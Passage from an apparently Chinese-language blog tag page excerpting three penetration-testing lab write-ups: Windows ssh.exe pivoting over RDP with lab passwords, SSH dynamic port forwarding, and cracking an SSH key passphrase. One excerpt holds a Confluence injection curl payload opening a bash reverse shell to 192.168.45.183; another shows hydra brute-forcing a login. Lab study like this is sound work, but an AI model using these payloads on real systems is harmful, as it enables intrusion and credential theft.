發表文章

目前顯示的是有「ssh」標籤的文章

Windows 連接埠轉發 - SSH.exe

圖片
 Windows 連接埠轉發 - SSH.exe Windows 自 1709 (Windows 10 Fall Creators Update) 以後的版本預設已在系統內建了相關 SSH 的程式,路徑在 %systemdrive%\Windows\System32\OpenSSH\* 底下 例如 scp.exe、sftp.exe、ssh.exe、etc... 可以直接在 command 底下使用者些指令,例如傳送檔案到某一台 Linux Documents 目錄下 指令 scp "D:\test.txt" kali@10.96.249.77:~/Documents/ 可以看到正確的傳送過去 透過這個簡單的演示告知我們在現在化的 Windows 機器上我們可以更方便的直接使用這些指令而不需要另外安裝相關程式,接下來我們將透過一台對外僅開放 3389 RDP 的 Windows 伺服器與前面所學的遠端動態連接 Port 的方式來利用 Windows Server 事實上沒有甚麼不一樣,僅是跳板的伺服器換成了 Windows 伺服器而已 靶機練習環境 攻擊機 192.168.45.250 靶機 192.168.242.64、10.4.242.215 rustscan 後發現我們可以進入的第一台 RDP 伺服器是 192.168.242.64 延續上幾節曾拿過的密碼如下,依據名稱來看優先使用第二個來測試  RDP 登入  - hr_admin : Welcome1234  - rdp_admin : P@ssw0rd!  - database_admin : sqlpass123 指令 xfreerdp /u:rdp_admin /p:P@ssw0rd! /v:192.168.242.64 順利登入如下,並看到該台 Windows 有另外一隻腳 10.4.242.64 所以要去到 10.4.242.0/24 就是要透過該台 Windows 去存取 透過 where ssh 指令查看與確認該台 Windows 伺服器有支援 SSH.exe 再透過 ssh.exe -V 確認一下版本,要高於 7.6 的版本才有支援動態連接 Port 轉發 可以看到版本是 8.1 指令與...

SSH Tunneling - Dynamic Port Forwarding

圖片
  SSH Tunneling - Dynamic Port Forwarding 上一篇本機連接埠轉送有一個明顯的限制:每個 SSH 連線只能連接到一個套接字 這使得大規模使用變得非常乏味。幸運的是,OpenSSH 還提供動態連接埠轉送 從 SSH 用戶端上的單一偵聽端口,封包可以轉送到 SSH 伺服器主機有權存取的任何套接字 SSH 動態連接埠轉送之所以有效,是因為 SSH 用戶端所建立的偵聽連接埠是 SOCKS 代理伺服器連接埠 SOCKS 是一種代理協定,與郵政服務非常相似。 SOCKS 伺服器接受資料包(帶有 SOCKS 協定標頭)並將它們轉發到它們所尋址的任何地方。 在 SSH 動態連接埠轉送中,封包可以傳送到 SSH 用戶端電腦上的單一偵聽 SOCKS 連接埠。 這些將透過 SSH 連接推送,然後轉發到 SSH 伺服器電腦可以路由的任何地方。 唯一的限制是資料包必須正確格式化 - 通常由 SOCK 相容的客戶端軟體格式化。 在某些情況下,軟體預設不相容於 SOCKS。 如下網路圖中說明 SSH 動態連接埠轉送 攻擊機 : 192.168.45.183 靶機環境 : 192.168.216.63、10.4.216.215、172.16.216.217 起手第一步先 CONFLUENCE 漏洞進入 192.168.216.63 curl -v http://192.168.216.63:8090/%24%7Bnew%20javax.script.ScriptEngineManager%28%29.getEngineByName%28%22nashorn%22%29.eval%28%22new%20java.lang.ProcessBuilder%28%29.command%28%27bash%27%2C%27-c%27%2C%27bash%20-i%20%3E%26%20/dev/tcp/192.168.45.183/4444%200%3E%261%27%29.start%28%29%22%29%7D/ nc 4444 Port 就進來了,接著下 python3 -c 'import pty; pty.spawn("/bin/bash")' 確保 TTY Shell 接著使用指令 ssh -N -D 0.0.0.0:9...

SSH 私鑰密碼破解

圖片
 SSH 私鑰密碼破解 第一台靶機 IP : 192.168.197.201 題目描述 : 通過破解私鑰密碼,使用 SSH 訪問 2222 Port 在用戶 dave 的主目錄中找到該標誌 第一步 rustscan,掃出 22、2222、8080 └─$ rustscan -a 192.168.197.201 --scripts none --ulimit 5000 訪問 8080 網站看看,是 TinyFileManager CMS 系統 先隨便登入送到 Burp Suite 查看是 POST 與帳號密碼欄位是 fm_usr & fm_pwd 透過原廠文件知道預設有 admin & user 兩種帳號,使用 hydra 暴力破解 user 密碼 └─$ hydra -l user -P /usr/share/wordlists/rockyou.txt 192.168.197.201 -s 8080 http-post-form "/index.php:fm_usr=user&fm_pwd=^PASS^:Login failed. Invalid" 獲得密碼是 121212 登入網站 user / 121212,看到 id_rsa 私密金鑰,並查看 note.txt id_rsa 為 private key 點選上圖的 Download 下載回來 另外查看 note.txt 檔案內容如下圖,可以看到有一些密碼列表,跟下方有說明新的密碼政策  - 3 個數字  - 1 個大寫字母  - 1 個特殊符號 先修改剛剛下載回來的 id_rsa 檔案的權限 chmod 600 id_rsa 透過 ssh 指令登入 ssh -i id_rsa -p 2222 dave@192.168.197.201 要求輸入密碼,使用 note.txt 裡面的密碼試試看,發現都無法過關 看來要破解 private key 的密碼 先用 jth 轉 private key 的 hash 生成 ssh.hash 檔案,指令 ssh2john id_rsa > ssh.hash hash 開頭為 id_rsa:$sshng$6$16$7059e78a8d3764ea1e8~...